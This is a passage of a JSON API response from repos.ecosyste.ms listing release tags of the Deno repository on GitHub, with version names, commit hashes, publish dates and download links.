ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1